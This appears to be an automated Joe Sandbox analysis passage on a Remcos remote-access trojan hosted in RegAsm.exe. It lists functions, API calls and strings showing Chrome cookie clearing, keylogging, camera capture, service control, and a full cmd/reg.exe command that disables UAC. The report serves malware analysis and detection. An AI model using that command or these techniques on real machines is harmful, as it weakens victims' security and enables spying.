                                                                                              Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                              • GetLastError.KERNEL32 ref: 0040BB22
                                                                                              Strings
                                                                                              • UserProfile, xrefs: 0040BAE8
                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                              • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                              • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DeleteErrorFileLast
                                                                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                              • API String ID: 2018770650-304995407
                                                                                              • Opcode ID: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                                                              • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                              • Opcode Fuzzy Hash: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                                                              • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                              Function 0041CE2C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • AllocConsole.KERNEL32 ref: 0041CE35
                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Console$AllocOutputShowWindow
                                                                                              • String ID: Remcos v$5.1.1 Pro$CONOUT$
                                                                                              • API String ID: 2425139147-3820604032
                                                                                              • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                              • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                                              • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                              • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                                              Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __allrem.LIBCMT ref: 0043ACE9
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                              • __allrem.LIBCMT ref: 0043AD1C
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                              • __allrem.LIBCMT ref: 0043AD51
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                              • String ID:
                                                                                              • API String ID: 1992179935-0
                                                                                              • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                              • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                              • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                              • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                              Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                                                • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: H_prologSleep
                                                                                              • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                              • API String ID: 3469354165-3054508432
                                                                                              • Opcode ID: f1f6abde2fe9b8c9e3d75d7419095e2e3e0e7bba2c6e5661e2c4ad636e720d24
                                                                                              • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                                              • Opcode Fuzzy Hash: f1f6abde2fe9b8c9e3d75d7419095e2e3e0e7bba2c6e5661e2c4ad636e720d24
                                                                                              • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                                              Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                              • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                                                                              • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                                                • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                                                • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                                • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 3950776272-0
                                                                                              • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                              • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                              • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                              • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                                              Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __cftoe
                                                                                              • String ID:
                                                                                              • API String ID: 4189289331-0
                                                                                              • Opcode ID: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                                                                              • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                              • Opcode Fuzzy Hash: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                                                                              • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                              Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                              • String ID:
                                                                                              • API String ID: 493672254-0
                                                                                              • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                              • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                              • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                              • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                              Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                              • _free.LIBCMT ref: 004482CC
                                                                                              • _free.LIBCMT ref: 004482F4
                                                                                              • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                              • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                              • _abort.LIBCMT ref: 00448313
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                              • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                              • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                              • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                              Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                              • String ID:
                                                                                              • API String ID: 221034970-0
                                                                                              • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                              • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                              • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                              • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                              Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                              • String ID:
                                                                                              • API String ID: 221034970-0
                                                                                              • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                              • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                              • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                              • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                              Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                              • String ID:
                                                                                              • API String ID: 221034970-0
                                                                                              • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                              • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                              • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                              • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                              Function 0040B19F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                              • wsprintfW.USER32 ref: 0040B22E
                                                                                                • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EventLocalTimewsprintf
                                                                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                              • API String ID: 1497725170-248792730
                                                                                              • Opcode ID: 040af8cc6add96acfd67c738291b93e2449d87e3c46e607f2c090e1ebd2b60af
                                                                                              • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                              • Opcode Fuzzy Hash: 040af8cc6add96acfd67c738291b93e2449d87e3c46e607f2c090e1ebd2b60af
                                                                                              • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                                              Function 00443AD3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: >Y
                                                                                              • API String ID: 0-2491313631
                                                                                              • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                              • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                                              • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                              • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                                              Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                              • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateHandleSizeSleep
                                                                                              • String ID: XQG
                                                                                              • API String ID: 1958988193-3606453820
                                                                                              • Opcode ID: 3b1a01b47bddebb3752f31eb226f8e532d480515b9e880c3ec3420bf47c2c25d
                                                                                              • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                                              • Opcode Fuzzy Hash: 3b1a01b47bddebb3752f31eb226f8e532d480515b9e880c3ec3420bf47c2c25d
                                                                                              • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                                                              Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ClassCreateErrorLastRegisterWindow
                                                                                              • String ID: 0$MsgWindowClass
                                                                                              • API String ID: 2877667751-2410386613
                                                                                              • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                              • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                              • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                              • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                              Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                              • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                              • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                              Strings
                                                                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                              • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$CreateProcess
                                                                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                              • API String ID: 2922976086-4183131282
                                                                                              • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                              • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                              • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                              • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                                              Function 0040729B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              • SG, xrefs: 00407715
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              • API String ID: 0-643455097
                                                                                              • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                              • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                                              • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                              • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                                              Function 004433DA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                              • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                                              • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                              • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                                              Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                              • CloseHandle.KERNEL32(?), ref: 00405140
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
